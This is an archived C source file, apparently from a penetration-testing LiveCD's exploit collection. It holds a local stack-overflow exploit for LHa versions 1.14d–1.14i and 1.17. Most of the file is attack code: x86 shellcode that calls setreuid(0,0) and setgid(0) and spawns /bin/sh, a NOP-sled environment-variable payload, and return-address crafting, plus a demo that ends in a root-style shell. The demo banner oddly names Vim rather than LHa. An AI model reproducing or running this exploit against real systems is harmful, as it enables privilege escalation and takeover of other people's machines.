home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / packer / lha / lha.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  5.2 KB  |  156 lines
  1. /* Author : N4rK07IX  narkotix@linuxmail.org
  2.  
  3.   Bug Found By : Ulf Ha"rnhammar <Ulf.Harnhammar.9485@student.uu.se> 
  4.  
  5. LHa buffer overflows and directory traversal problems
  6.  
  7.  
  8. PROGRAM: LHa (Unix version)
  9. VENDOR: various people
  10. VULNERABLE VERSIONS: 1.14d to 1.14i            // Theze sectionz completely taken from full-disclosure :))
  11.                      1.17 (Linux binary)
  12.                      possibly others
  13. IMMUNE VERSIONS: 1.14i with my patch applied
  14.                  1.14h with my patch applied
  15.  
  16. Patch : Ulf Ha"rnhammar made some patch U can find it on :
  17.           LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm
  18.       http://www2m.biglobe.ne.jp/~dolphin/lha/prog/
  19.           LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/
  20.  
  21.  
  22. ---------------------------------------------------------------
  23.  
  24. Little Explanation about Exploit : Copy the attached overflow.lha file to your directory , i.e /home
  25. Then open overflow.lha with text editor(vim is better), U will see there four bytes XXXX at the end of the line, just
  26. delete XXXX and paste your ASCII RET address there,but make sure not to malform the file.Then run the sploit.
  27.  
  28. Note : overflow.lha file is completely taken from Ulf's post.
  29.  
  30. Demo:
  31.  
  32. addicted@labs:~/c-hell$ ./lha /home/addicted/overflow.lha 
  33. --------------------------------------------------
  34. | Author : N4rK07IX
  35. | Vim 6.x Local Xpl0it
  36. | narkotix@linuxmail.org
  37. |--------------------------------------------------
  38. [+] RET ADDRESS = 0xbffffd90
  39. [!] Paste These ASCII 4 bytes Ret Adress to the XXXX in the file overflow.lha
  40. [!] ASCII RET ADDR = É² ┐
  41. [+] Exploiting the buffer..
  42. LHa: Error: Unknown information 
  43. UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUAAAAAAAɲ ┐B
  44. sh-2.05b$ 
  45.  
  46. Gretingz: Efnet,mathmonkey,Uz4yh4N,laplace_ex,xmlguy,gotcha,forkbomb
  47.  
  48. */
  49.  
  50. #include <stdio.h>
  51. #include <string.h>
  52. #include <unistd.h>
  53.  
  54. #define BUFFERSIZE 2000
  55. #define FEED 600 
  56. #define PATH "/usr/bin/lha"
  57. #define PROG "lha" 
  58.  
  59. static char shellcode[] =
  60.  
  61.         //* setreuid(0,0);
  62.         "\x31\xc0"                      // xor    %eax,%eax
  63.         "\x31\xdb"                      // xor    %ebx,%ebx
  64.         "\x31\xc9"                      // xor    %ecx,%ecx
  65.         "\xb0\x46"                      // mov    $0x46,%al
  66.         "\xcd\x80"                      // int    $0x80
  67.  
  68.         /* setgid(0); */
  69.         "\x31\xdb"                      // xor %ebx,%ebx
  70.         "\x89\xd8"                      // mov %ebx,%eax
  71.         "\xb0\x2e"                      // mov $0x2e,%al
  72.         "\xcd\x80"                      // int $0x80
  73.  
  74.         // execve /bin/sh
  75.         "\x31\xc0"                      // xor    %eax,%eax
  76.         "\x50"                          // push   %eax
  77.         "\x68\x2f\x2f\x73\x68"          // push   $0x68732f2f
  78.         "\x68\x2f\x62\x69\x6e"          // push   $0x6e69622f
  79.         "\x89\xe3"                      // mov    %esp,%ebx
  80.         "\x8d\x54\x24\x08"              // lea    0x8(%esp,1),%edx
  81.         "\x50"                          // push   %eax
  82.         "\x53"                          // push   %ebx
  83.         "\x8d\x0c\x24"                  // lea    (%esp,1),%ecx
  84.         "\xb0\x0b"                      // mov    $0xb,%al
  85.         "\xcd\x80"                      // int    $0x80
  86.  
  87.         // exit();
  88.         "\x31\xc0"                      // xor    %eax,%eax
  89.         "\xb0\x01"                      // mov    $0x1,%al
  90.         "\xcd\x80";                     // int    $0x80
  91.  
  92.  
  93. int main(int argc, char *argv[])
  94.     
  96.         if( argc < 2 )
  97.         { printf("[-] Enter The Full Of the overflow.lha \n");
  98.           exit(-1);
  99.         }
  100.  
  101.  
  102.  
  103.         printf("--------------------------------------------------\n");
  104.     printf("| Author : N4rK07IX\n");
  105.         printf("| Found by : Ulf Ha'rnhammar\n");
  106.     printf("| LHa 1.14d 1.14i 1.17 Local Lame Stack Overflow Sploit\n");
  107.     printf("| narkotix@linuxmail.org\n");
  108.     printf("|--------------------------------------------------\n");
  109.             
  110.     char buffer[BUFFERSIZE];   
  111.     char addict[FEED];
  112.     
  113.     int i,
  114.         *adr_pointer,
  115.         *addict_pointer;
  116.         
  117.     memset(addict,0x90,sizeof(addict));
  118.         memcpy(&addict[FEED-strlen(shellcode)],shellcode,strlen(shellcode)); 
  119.         memcpy(addict,"ADDICT=",7);
  120.         putenv(addict);
  121.     
  122.     unsigned long ret = 0XBFFFFFFA -strlen("/usr/bin/lha") - strlen(addict);
  123.     printf("[+] RET ADDRESS = 0x%x\n",ret);
  124.         
  125.          char l =  (ret & 0x000000ff);
  126.          char a =  (ret & 0x0000ff00) >> 8;
  127.          char m =  (ret & 0x00ff0000) >> 16;
  128.          char e =  (ret & 0xff000000) >> 24;
  129.  
  130.         
  131.  
  132.  
  133.  
  134.         printf("[!] Paste These ASCII 4 bytes Ret Adress to the XXXX in the file overflow.lha\n");
  135.         printf("[!] ASCII RET ADDR = %c%c%c%c\n",l,a,m,e);
  136.     printf("[+] Exploiting the buffer..\n");
  137.         adr_pointer = (int *)(buffer);
  138.     
  139.     for(i = 0 ; i < BUFFERSIZE ; i += 4)
  140.     *adr_pointer++ = ret;
  141.     execl(PATH,PROG,"x",argv[1],NULL);
  142.     if(!execl);
  143.     perror("execl()");
  144.     printf("[+] Done B4by\n");
  145.     
  146.     return 0;
  147. }
  148.  
  149.  
  150.     
  151.     
  152.  
  153.  
  154.     
  155.            
  156.